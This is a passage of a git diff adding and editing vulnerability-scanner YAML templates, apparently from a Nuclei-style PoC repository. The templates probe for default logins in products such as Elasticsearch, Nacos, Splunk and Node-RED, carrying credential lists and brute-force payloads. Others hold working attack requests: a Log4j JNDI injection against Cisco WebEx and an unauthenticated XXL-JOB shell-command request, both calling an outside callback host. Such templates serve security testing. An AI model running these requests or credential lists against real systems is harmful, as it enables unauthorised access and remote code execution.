https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610 + - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667 + tags: default-login,elasticsearch + +http: + - raw: + - | + POST /internal/security/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5 + Referer: {{RootURL}}/login + Content-Type: application/json + kbn-version: 8.8.2 + x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D + Origin: {{RootURL}} + + {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }} + + payloads: + username: + - elastic + password: + - changeme + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: sid=' + - 'kbn-license-sig:' + condition: and + case-insensitive: true + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/esafenet-cdg-default-login.yaml b/poc/auth/esafenet-cdg-default-login.yaml new file mode 100644 index 0000000000..93cf1ce1f1 --- /dev/null +++ b/poc/auth/esafenet-cdg-default-login.yaml @@ -0,0 +1,56 @@ +id: esafenet-cdg-default-login + +info: + name: Esafenet CDG - Default Login + author: chesterblue + severity: high + description: | + Esafenet electronic document security management system default credentials were discovered. + metadata: + verified: true + max-request: 32 + fofa-query: esafenet + tags: esafenet,cdg,default-login + +http: + - method: POST + path: + - "{{BaseURL}}/CDGServer3/SystemConfig" + + headers: + content-type: application/x-www-form-urlencoded + + body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}" + attack: clusterbomb + payloads: + username: + - "systemadmin" + - "configadmin" + - "secadmin" + - "docadmin" + password: + - "Est@Spc820" + - "12345678" + - "123456" + - "Est@Spc2018" + - "Est@Spc2019" + - "Est@Spc2020" + - "Est@Spc2021" + - "Est@Spc2022" + + matchers-condition: and + matchers: + - type: word + words: + - "est.connection.url" + + - type: regex + part: body + regex: + - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}" + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/feiyuxing-default-login.yaml b/poc/auth/feiyuxing-default-login.yaml new file mode 100644 index 0000000000..dbed124320 --- /dev/null +++ b/poc/auth/feiyuxing-default-login.yaml @@ -0,0 +1,51 @@ +id: feiyuxing-default-login + +info: + name: Feiyuxing Enterprise-Level Management System - Default Login + author: SleepingBag945 + severity: high + description: | + Attackers can log in through admin:admin, check the system status, and configure the device. + reference: + - https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py + metadata: + verified: true + max-request: 1 + fofa-query: title="飞鱼星企业级智能上网行为管理系统" + tags: feiyuxing,default-login,iot + +http: + - raw: + - | + POST /send_order.cgi?parameter=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + {"username":"{{username}}","password":"{{password}}"} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"msg":"ok"' + - '"type":' + condition: and + + - type: word + part: header + words: + - 'hash_key=' + + - type: status + status: + - 200 + +# digest: 4a0a0047304502201fb4a76b318f9c3a0993dd312148f6a0823954ab3354a41be198c6917ee1c059022100ad6214108becac7c0bdcd5a523f67d04cde7b3efbfc1d4e1a9395c79f992af0f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/fusionauth-admin-setup.yaml b/poc/auth/fusionauth-admin-setup.yaml index ca258391c6..16b895fbd1 100644 --- a/poc/auth/fusionauth-admin-setup.yaml +++ b/poc/auth/fusionauth-admin-setup.yaml @@ -4,6 +4,7 @@ info: name: FusionAuth Exposed Admin Setup author: ritikchaddha severity: high + description: FusionAuth Admin Setup is exposed. metadata: verified: true max-request: 1 @@ -27,5 +28,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220376b6bd64a81c4ef24447743216a081ba75c3f722d4c2d3ac96241eff2cef6c3022100a543c922c5146f3d4219bb5b2b070fb1bb86e81ceca7f376066a3a4a1535132b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022007d4dbb8a296fe926e5f296078aecfd6e737a4478b5ce8761f2de44c8620c953022018807ad838fddfa4096e7915fccf574e67b1c1b935d5c10d07082af0640b8632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/grafana-login-check.yaml b/poc/auth/grafana-login-check.yaml new file mode 100644 index 0000000000..af3016bbb2 --- /dev/null +++ b/poc/auth/grafana-login-check.yaml @@ -0,0 +1,55 @@ +id: grafana-login-check + +info: + name: Grafana Login Check + author: parthmalhotra,pdresearch + severity: critical + description: Checks for a valid login on self hosted Grafana instance. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + max-request: 1 + shodan-query: title:"Grafana" + fofa-query: title="Grafana" + tags: login-check,grafana,creds-stuffing,self-hosted +variables: + username: "{{username}}" + password: "{{password}}" + +http: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + accept: application/json, text/plain, */* + DNT: 1 + content-type: application/json + Origin: {{BaseURL}} + Referer: {{BaseURL}}/login + Cookie: redirect_to=%2F + + {"user":"{{username}}","password":"{{password}}"} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Logged in' + + - type: word + part: header + words: + - 'grafana_session' + + - type: status + status: + - 200 + +# digest: 4a0a0047304502207fa6c2d6cce086e723ac4fbf51dae2962116ee41bba7e62675dbc198c086354e022100c32ffecff72430025fa4c185f2d10781096541768e3c843e9e1c8e1d17022be6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/grav-register-admin.yaml b/poc/auth/grav-register-admin.yaml index 66d50ca997..4da6743163 100644 --- a/poc/auth/grav-register-admin.yaml +++ b/poc/auth/grav-register-admin.yaml @@ -4,6 +4,7 @@ info: name: Grav Register Admin User - Detect author: DhiyaneshDk severity: high + description: Exposed Grav admin user register page. metadata: verified: true max-request: 1 @@ -27,5 +28,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f2e80bf84c5f0486850225ad39b99121e662f111e55e0a2dc064fcce9cc3995c022100e1ff1569b790382c69dcba5b1b82edab35961cfc529adff2a8bf7ac697db0040:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fee93345e98c4b7f5f6b1346f747fae537d02194b62d3c9c653542d472b10d7a02200ad9542dc8d977f677e61266dc7d2aecb4d540ced8f44ec80086f6d8705f0916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/kylin-default-login.yaml b/poc/auth/kylin-default-login.yaml new file mode 100644 index 0000000000..cb1fb20d6c --- /dev/null +++ b/poc/auth/kylin-default-login.yaml @@ -0,0 +1,55 @@ +id: kylin-default-login + +info: + name: Apache Kylin Console - Default Login + author: SleepingBag945 + severity: high + description: | + The default password for the Apache Kylin Console is KYLIN for the ADMIN user in Kylin versions before 3.0.0. + reference: + - https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml + - https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker + metadata: + verified: true + max-request: 6 + fofa-query: app="APACHE-kylin" + tags: kylin,default-login,apache + +http: + - raw: + - | + GET /kylin/api/user/authentication HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + attack: clusterbomb + payloads: + username: + - ADMIN + - admin + password: + - KYLIN + - kylin + - 123456 + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"userDetails":' + - '"username":' + - '"password":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 490a0046304402201fcf0b913c72b187052e4b5e7871e7d0e5b5df5339bb686cba1d688f6b12ab5702201e25e7c9eaedcea9be02d16d4759ab89f87e1bbd505c6144f94e671bc2b25db0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/leostream-default-login.yaml b/poc/auth/leostream-default-login.yaml new file mode 100644 index 0000000000..19ff436f70 --- /dev/null +++ b/poc/auth/leostream-default-login.yaml @@ -0,0 +1,53 @@ +id: leostream-default-login + +info: + name: Leostream Default Login + author: bhutch + severity: high + description: | + Leostream default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Leostream" + tags: leostream,default-login + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + + login_type=0&user={{username}}&password={{password}}&submit=SIGN+IN + + payloads: + username: + - admin + password: + - leo + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Set-Cookie: lld=%21" + + - type: word + part: header + words: + - 'index.pl' + - 'server.pl' + - 'status.pl' + condition: or + + - type: status + status: + - 302 + +# digest: 4a0a004730450221009d6b9b830062d1842295e184eb57d4ee56e1f1e4ef08c04432d2b7228f38ab4b02203ad0601a6b79882c8f54b7885cb11581f4eacf1ed0f5323f0b78c6014ad3a761:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/nacos-default-login.yaml b/poc/auth/nacos-default-login.yaml new file mode 100644 index 0000000000..4d14e9d597 --- /dev/null +++ b/poc/auth/nacos-default-login.yaml @@ -0,0 +1,58 @@ +id: nacos-default-login + +info: + name: Alibaba Nacos - Default Login + author: SleepingBag945 + severity: high + description: | + The default username and password for Nacos are both nacos. + metadata: + verified: true + max-request: 2 + fofa-query: title=="Nacos" + tags: nacos,default-login,alibaba + +http: + - raw: + - | + POST /v1/auth/users/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Nacos-Server + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + POST /nacos/v1/auth/users/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Nacos-Server + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - nacos + password: + - nacos + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"accessToken":' + - '"username":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100f1e6f9c8dd27b0141b612bb668588d99e6709603a0cda653f7a1c6a7f882728d02202fb57fdfd3c7e625aed2f17eadc5a8ef82f752c7a5d50e963e616cbf763d639d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/nodered-default-login.yaml b/poc/auth/nodered-default-login.yaml new file mode 100644 index 0000000000..12548d6fb5 --- /dev/null +++ b/poc/auth/nodered-default-login.yaml @@ -0,0 +1,51 @@ +id: nodered-default-login + +info: + name: Node-Red - Default Login + author: savik + severity: critical + description: | + Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials. + reference: + - https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:321591353 + tags: default-login,node-red,dashboard + +http: + - raw: + - | + POST /auth/token HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + client_id=node-red-editor&grant_type=password&scope=&username={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - admin + password: + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'access_token":' + - 'expires_in":' + - 'token_type":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/pyload-default-login.yaml b/poc/auth/pyload-default-login.yaml new file mode 100644 index 0000000000..b626545bb3 --- /dev/null +++ b/poc/auth/pyload-default-login.yaml @@ -0,0 +1,46 @@ +id: pyload-default-login + +info: + name: PyLoad Default Login + author: DhiyaneshDk + severity: high + description: | + PyLoad Default Credentials were discovered. + reference: + - https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20. + metadata: + verified: true + max-request: 1 + shodan-query: html:"pyload" + tags: default-login,pyload + +http: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + do=login&username={{username}}&password={{password}}&submit=Login + + payloads: + username: + - pyload + password: + - pyload + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: pyload_session=' + - '/dashboard' + condition: and + + - type: status + status: + - 302 + +# digest: 4b0a00483046022100887e6f5542621f9fd95a3e282c0a2de60e2fe8e1e0fc0fcbe1dd257885cb5d63022100a040e0e40efa61edc561c8aa3f0a00637973247e99c02bf2eef6d4d6a7aadbbc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/splunk-default-login.yaml b/poc/auth/splunk-default-login.yaml new file mode 100644 index 0000000000..8afecbbefe --- /dev/null +++ b/poc/auth/splunk-default-login.yaml @@ -0,0 +1,69 @@ +id: splunk-default-login + +info: + name: Splunk - Default Password + author: pussycat0x + severity: high + description: | + Splunk Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + max-request: 9 + shodan-query: http.title:"Splunk" + tags: default-login,splunk + +http: + - raw: + - | + GET /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + - | + POST /en-US/account/login HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate, br + Referer: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{BaseURL}} + + {{cval}}&username={{username}}&password={{password}}&return_to=%2Fen-US%2F&set_has_logged_in=false + - | + GET /en-US/splunkd/__raw/services/server/health/splunkd?output_mode=json&_= HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate, br + Referer: {{BaseURL}} + + attack: pitchfork + payloads: + username: + - "admin" + - "splunk" + - "root" + password: + - "admin" + - "splunk" + - "toor" + + stop-at-first-match: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - "splunkd" + - "updated" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + internal: true + name: cval + part: header + regex: + - 'cval=([0-9]+)' +# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/teslamate-unauth-access.yaml b/poc/auth/teslamate-unauth-access.yaml new file mode 100644 index 0000000000..845642aa56 --- /dev/null +++ b/poc/auth/teslamate-unauth-access.yaml @@ -0,0 +1,41 @@ +id: teslamate-unauth-access + +info: + name: TeslaMate - Unauthenticated Access + author: For3stCo1d + severity: medium + description: | + A misconfig in Teslamate allows unauthorized access to /settings endpoint. + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1478287554 + fofa-query: title="teslamate" + tags: misconfig,teslamate,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/settings" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Settings · TeslaMate" + - "URLs" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "([0-9.]+)" + +# digest: 4b0a00483046022100a34f3dcd06fb844c5e881b8c8352b999dc24c0d0aa7b9f46bd01b87434a24f350221009cc0b519c750367431d73d8576f4815100cc5b7673c8d314a2d4fe7cf747538c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/tongda-meeting-unauth.yaml b/poc/auth/tongda-meeting-unauth.yaml new file mode 100755 index 0000000000..82e236196b --- /dev/null +++ b/poc/auth/tongda-meeting-unauth.yaml @@ -0,0 +1,29 @@ +id: tongda-meeting-unauth + +info: + name: Tongda OA Meeting - Unauthorized Access + author: SleepingBag945 + severity: medium + description: | + Tongda Meeting Unauthorized Access were Detected. + reference: + - https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10 + metadata: + verified: true + max-request: 1 + fofa-query: app="TDXK-通达OA" + tags: tongda,unauth,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay" + + matchers: + - type: dsl + dsl: + - status_code == 200 && contains(header, 'application/json') + - contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":') + condition: and + +# digest: 4a0a00473045022029eb9d9d545baec4d0f578a10dc5d80bec85c87e3f1cf9ba17933bd242cbb164022100d83d82f1c8bde2f33f1bc331ba22cd156b9984612a602d9e47e5599a498f3dbd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauth-celery-flower.yaml b/poc/auth/unauth-celery-flower.yaml index 6a271dab1a..13de5b3b8a 100644 --- a/poc/auth/unauth-celery-flower.yaml +++ b/poc/auth/unauth-celery-flower.yaml @@ -20,12 +20,12 @@ http: matchers: - type: word words: - - 'Dashboard' - - 'Tasks' + - /dashboard + - /tasks + - github.com/mher/flower condition: and - type: status status: - 200 - -# digest: 490a0046304402201e0bb5dff7fc75fa6e67fe6c429d5cc0331604853cff8663f26770ddfc3fb8b402205d1faee134a18dd60ea20f8f71ce8d437249f728148ec5b1fc8dc7aca6df27de:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022035c4a49f967fe61a41af8ca9b7ef7593aae1af64378c0724f8d653c03b7c2f5b02205ce594331fc5fd9f4d464423082c469ef27162cbafa76ad3b0c569416bb81866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/unauth-temporal-web-ui.yaml b/poc/auth/unauth-temporal-web-ui.yaml index 29f3b9911a..5a81343763 100644 --- a/poc/auth/unauth-temporal-web-ui.yaml +++ b/poc/auth/unauth-temporal-web-ui.yaml @@ -15,7 +15,7 @@ info: verified: "true" max-request: 2 shodan-query: http.favicon.hash:557327884 - tags: temporal,unauth + tags: misconfig,temporal,unauth http: - method: GET @@ -34,5 +34,4 @@ http: - "contains(body_2, 'nextPageToken') && status_code_2 == 200" - "contains(body_2, 'Namespace default is not found.') && status_code_2 == 404" condition: or - -# digest: 4a0a00473045022100fd80f97bd588e2a7735fbc258ea5b50508f786384b74adc3fafac28f96e32d4602202bee503f1cf7a9ddf2e4c4227239a0475e77a562fbf8ced464bb9cdf0fd21cfa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e23471f799588e5121a981fa02bd8b1490449748125c06235ea2e1607e2439e3022100a92beae88b23261b448c696a9863d008afae153ea3759317a41ef9958c02e31e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/unauth-ztp-ping.yaml b/poc/auth/unauth-ztp-ping.yaml new file mode 100644 index 0000000000..dce38605bc --- /dev/null +++ b/poc/auth/unauth-ztp-ping.yaml @@ -0,0 +1,46 @@ +id: unauth-ztp-ping + +info: + name: Unauthenticated ZyXEL USG ZTP - Detect + author: dmartyn + severity: high + description: | + Make a ZyXEL USG with ZTP support, pre CVE-2023-28771 patch, do a DNS lookup by asking it to make an ICMP request. + This template can be used to detect hosts potentially vulnerable to CVE-2023-28771, CVE-2022-30525, and other issues, without actually exploiting the vulnerability. + reference: + - https://www.fullspectrum.dev/the-hunt-for-cve-2023-28771-friends-part-2-fingerprinting-handler/ + - https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls + metadata: + verified: true + max-request: 1 + shodan-query: title:"USG FLEX" + tags: misconfig,unauth,zyxel,ztp,rce,oast + +http: + - raw: + - | + POST /ztp/cgi-bin/handler HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"command":"ping","dest":"{{interactsh-url}}"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - "message" + - "result" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502210088ebd31c0c2e0991760e848c1cd717d31e59b52d1eba75b22cfb9561c9e8b44302203bb21fde8ace66f8440da2c84ca7a69c84cd5a96882b50d3d064e3b93b5432de:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/weaver-userselect-unauth.yaml b/poc/auth/weaver-userselect-unauth.yaml new file mode 100755 index 0000000000..9861f40195 --- /dev/null +++ b/poc/auth/weaver-userselect-unauth.yaml @@ -0,0 +1,35 @@ +id: weaver-userselect-unauth + +info: + name: OA E-Office UserSelect Unauthorized Access + author: SleepingBag945 + severity: high + description: | + OA E-Office UserSelect interface has an unauthorized access vulnerability, through which attackers can obtain sensitive information + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java + - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20UserSelect%20未授权访问漏洞.html + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-EOffice" + tags: weaver,e-office,oa,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/UserSelect/" + + matchers-condition: and + matchers: + - type: word + words: + - "选择人员" + - "/UserSelect/dept.php" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100a5327e5c4aa4bba40eb3dd6591e0262f3b68adb18dfe67506e1d01b19d89aea502205e2bc2df2faf6ad056f62b27aeb9871fc23f7f75f6e422837c1f4d1344a9ba6b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/xxljob-executor-unauth.yaml b/poc/auth/xxljob-executor-unauth.yaml new file mode 100644 index 0000000000..772187d123 --- /dev/null +++ b/poc/auth/xxljob-executor-unauth.yaml @@ -0,0 +1,81 @@ +id: xxljob-executor-unauth + +info: + name: XXL-JOB executor - Unauthorized Access + author: k3rwin + severity: critical + description: | + XXL-JOB is a distributed task scheduling platform. Its core design goals are rapid development, easy learning, lightweight, and easy expansion. The source code is now open and connected to the online product lines of many companies, ready to use out of the box. XXL-JOB is divided into two ends: admin and executor. The former is the background management page, and the latter is the client for task execution. The executor is not configured with authentication by default, and unauthorized attackers can execute arbitrary commands through the RESTful API. + reference: + - https://github.com/jas502n/xxl-job/blob/main/README.md + - https://github.com/vulhub/vulhub/blob/master/xxl-job/unacc/README.md + metadata: + verified: true + max-request: 2 + fofa-query: app="XXL-JOB" + tags: xxljob,unauth,misconfig,rce + +http: + - raw: + - | + POST /run HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Xxl-Job-Access-Token: default_token + Content-Length: 396 + + { + "jobId": {{rand_int(1000)}}, + "executorHandler": "demoJobHandler", + "executorParams": "demoJobHandler", + "executorBlockStrategy": "COVER_EARLY", + "executorTimeout": 0, + "logId": 1, + "logDateTime": 1586629003729, + "glueType": "GLUE_SHELL", + "glueSource": "ping {{interactsh-url}}", + "glueUpdatetime": 1586699003758, + "broadcastIndex": 0, + "broadcastTotal": 0 + } + - | + POST /run HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Xxl-Job-Access-Token: default_token + Content-Length: 396 + + { + "jobId": {{rand_int(1000)}}, + "executorHandler": "demoJobHandler", + "executorParams": "demoJobHandler", + "executorBlockStrategy": "COVER_EARLY", + "executorTimeout": 0, + "logId": 1, + "logDateTime": 1586629003729, + "glueType": "GLUE_POWERSHELL", + "glueSource": "ping {{interactsh-url}}", + "glueUpdatetime": 1586699003758, + "broadcastIndex": 0, + "broadcastTotal": 0 + } + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"code":200}' + + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol + words: + - "dns" + +# digest: 4a0a0047304502201267f2958b6162f2a27bae7de33cd563307d68254c033642718abe971f52b2fa022100e392c7bb7e02c9d281798ee931978e2acfc754dd18a8c6f2668d146b73a0fd4d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-webex-log4j-rce.yaml b/poc/cisco/cisco-webex-log4j-rce.yaml new file mode 100644 index 0000000000..ab879def50 --- /dev/null +++ b/poc/cisco/cisco-webex-log4j-rce.yaml @@ -0,0 +1,66 @@ +id: cisco-webex-log4j-rce + +info: + name: Cisco WebEx - Remote Code Execution (Apache Log4j) + author: shaikhyaser + severity: critical + description: | + Cisco WebEx is susceptible to Log4j JNDI remote code execution. Cisco WebEx provides web conferencing, videoconferencing and contact center as a service applications. + reference: + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + cwe-id: CWE-77 + metadata: + max-request: 1 + shodan-query: title:"Cisco WebEx" + tags: cve,cve2021,rce,jndi,log4j,cisco,webex,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + str: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /orion/login?siteurl=meet HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}}/orion/login?siteurl=meet&rnd=0.1359184728177283 + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded + + type=getFailureTimes&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&bAjax=true + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + part: interactsh_request + + - type: regex + group: 1 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request + +# digest: 4a0a00473045022042bdc493eb4ec91bbcbcd56ef58972f45032f56c91a340ccc75e523f1953badf022100b70c8852cc0ae3850e5574cc27f06e2eaed76319f53bbb9e1cfe7a4061bd3640:922c64590222798bb761d5b6d8e72950 diff --git a/poc/config/dompdf-config.yaml b/poc/config/dompdf-config.yaml index 38981b690a..5cf2e3c574 100644 --- a/poc/config/dompdf-config.yaml +++ b/poc/config/dompdf-config.yaml @@ -9,8 +9,9 @@ info: classification: cwe-id: CWE-200 metadata: - fofa-query: title="dompdf - The PHP 5 HTML to PDF Converter" verified: true + max-request: 6 + fofa-query: title="dompdf - The PHP 5 HTML to PDF Converter" tags: config,exposure,dompdf http: @@ -36,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bb0497066655da6838308fb2d31e9e1499f89c02c68ead8a38ac1516fc12681a02200985b1f98d0fbb16c2c2b09124119b1af02f34290ebee6fcd09379cbb89e31b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022019ae7446da8cf0c57c637cecd750773679e29ca526116d27a32b066d44aa735d022100d6965160cb2f94abccbd3d1cad0431a1b9cf64c94b1ab9f758c3e0d743993699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/config/joomla-config-dist-file.yaml b/poc/config/joomla-config-dist-file.yaml old mode 100755 new mode 100644 index 023399c215..676958e944 --- a/poc/config/joomla-config-dist-file.yaml +++ b/poc/config/joomla-config-dist-file.yaml @@ -1,35 +1,31 @@ id: joomla-config-dist-file + info: name: Joomla Config Dist File - author: - - l0ne1y - description: |- - joomla配置文件泄露 - php-dist是Joomla创建的用来保存Joomla设置的文件,未经允许的访问会导致敏感信息泄露 + author: oppsec severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序: - http://www.joomla.org/ - 临时修复方案: - 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 - 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + description: configuration.php-dist is a file created by Joomla to save Joomla settings. + tags: config,exposure,joomla + requests: -- matchers: - - type: word - condition: and - words: - - Joomla - - JConfig - - '@package' - - type: word - part: header - words: - 